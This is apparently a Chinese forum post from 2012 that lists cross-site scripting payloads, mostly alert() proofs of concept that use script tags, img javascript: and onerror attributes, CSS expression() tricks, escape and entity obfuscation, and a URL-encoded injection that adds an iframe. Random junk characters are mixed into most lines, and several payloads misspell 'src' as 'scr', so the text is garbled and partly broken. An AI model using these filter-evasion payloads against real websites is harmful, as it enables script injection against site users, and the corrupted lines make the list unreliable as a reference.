<script>alert("跨站")</script> (最常用). E1 O* Y y8 M8 N" |, l4 @
<img scr=javascript:alert("跨站")></img>' v2 i% J, j6 F1 j/ L) Q
<img scr="javascript: alert(/跨站/)></img> {! o5 S h9 @! y
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
# g% B; ?& x' h, u! d9 _<img scr="#" onerror=alert(/跨站/)></img>! G9 g) T2 b, G% a' E, k+ H
<img scr="#" style="xss:expression(alert(/xss/));"></img>
2 Q: M v* q1 d$ V( n; s# D4 q<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)$ @, z( S0 ?7 G; H
<img src=vbscript:msgbox ("xss")></img>
! ^ ?; N: n. w3 L8 S4 X<style> input {left:expression (alert('xss'))}</style>) R% f: G0 D, H9 n4 ^
<div style={left:expression (alert('xss'))}></div>
/ m* ~+ B/ V: L2 N- ^/ t<div style={left:exp/* */ression (alert('xss'))}></div>. M% `' H5 k, h+ ~- V
<div style={left:\0065\0078ression (alert('xss'))}></div>( U( N) K4 j9 f! X( z: e
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>" q0 a) X. j4 E* |& e' c0 Q2 M
unicode <div style="{left:expRessioN (alert('xss'))}">4 ~* f% ^9 ?% [/ q" \
" {3 U$ U: G' ^1 X$ z& ^
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
1 K6 A% ?' j t1 |. n9 k6 K |
发表于 2012-9-15 14:09:13
收藏
支持
反对